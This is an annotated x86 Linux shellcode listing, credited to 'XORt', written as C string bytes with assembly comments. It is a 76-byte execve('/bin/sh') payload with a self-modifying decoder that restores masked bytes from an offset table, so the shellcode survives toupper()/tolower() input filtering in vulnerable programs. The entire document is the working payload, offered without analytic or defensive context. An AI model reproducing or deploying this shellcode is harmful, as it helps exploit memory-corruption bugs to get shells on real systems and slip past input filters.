/*-------------------------------------------------------*/ /* Magic Byte Self Modifying Code for surviving */ /* toupper() & tolower() */ /* 76bytes execve() _exit() code by XORt */ /*-------------------------------------------------------*/ "\xeb\x34" /* jmp $0x34 [revert] */ "\x5e" /* pop %esi */ /*--set-up-variables-------------------------------------*/ "\x89\xf7" /* mov %esi, %edi */ "\x83\xef\x22" /* sub $0x22, %edi */ "\x31\xc9" /* xor %ecx, %ecx */ "\xb1\x8c" /* mov $0x8c, %cl */ "\xd1\xc9" /* ror $0x1, %ecx (70loops) */ /*-scan-for-magic-byte-----------------------------------*/ "\xb0\x7b" /* mov $0x7b, %al */ "\xf2\xae" /* repne scasb */ "\xff\xcf" /* dec %edi */ "\xac" /* lodsb (al=DS:SI) */ "\x28\x07" /* subb %al, (%edi) */ /*--loop-back-to-scanner---------------------------------*/ "\xe2\xf5" /* loop -$0xe [load-byte] */ /*-------------------------------------[length:25bytes]--*/ // // /*--modified-shellcode-----------------------------------*/ "\x89\x7b\x08" /* movl %esi, 0x8(%esi) @*/ "\x91" /* xchg %eax, %ecx */ "\x88\x7b\x07" /* movb %al, 0x7(%esi) @*/ "\x89\x7b\x0c" /* movl %eax, 0xc(%esi) @*/ "\xb0\x0b" /* movb $0xb, %al */ "\x89\xf3" /* movl %esi, %ebx */ "\x8d\x7b\x08" /* leal 0x8(%esi), %ecx @*/ "\x8d\x7b\x0c" /* leal 0xc(%esi), %edx @*/ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx, %ebx */ "\x89\xd8" /* movl %ebx, %eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ /*--revert-----------------------------------------------*/ "\xe8\xc7\xff\xff\xff" /* call -$0x39 */ /*--offset-table-----------------------------------------*/ "\x05\x35\x35\x2d\x25\x19\x12\x0d\x08\x13" /**/ /*--string-to-run----------------------------------------*/ "/\x7b\x7b\x7b/\x7b\x7b" /* .string "/bin/sh" */ /*--------------------------------------[length:51bytes]-*/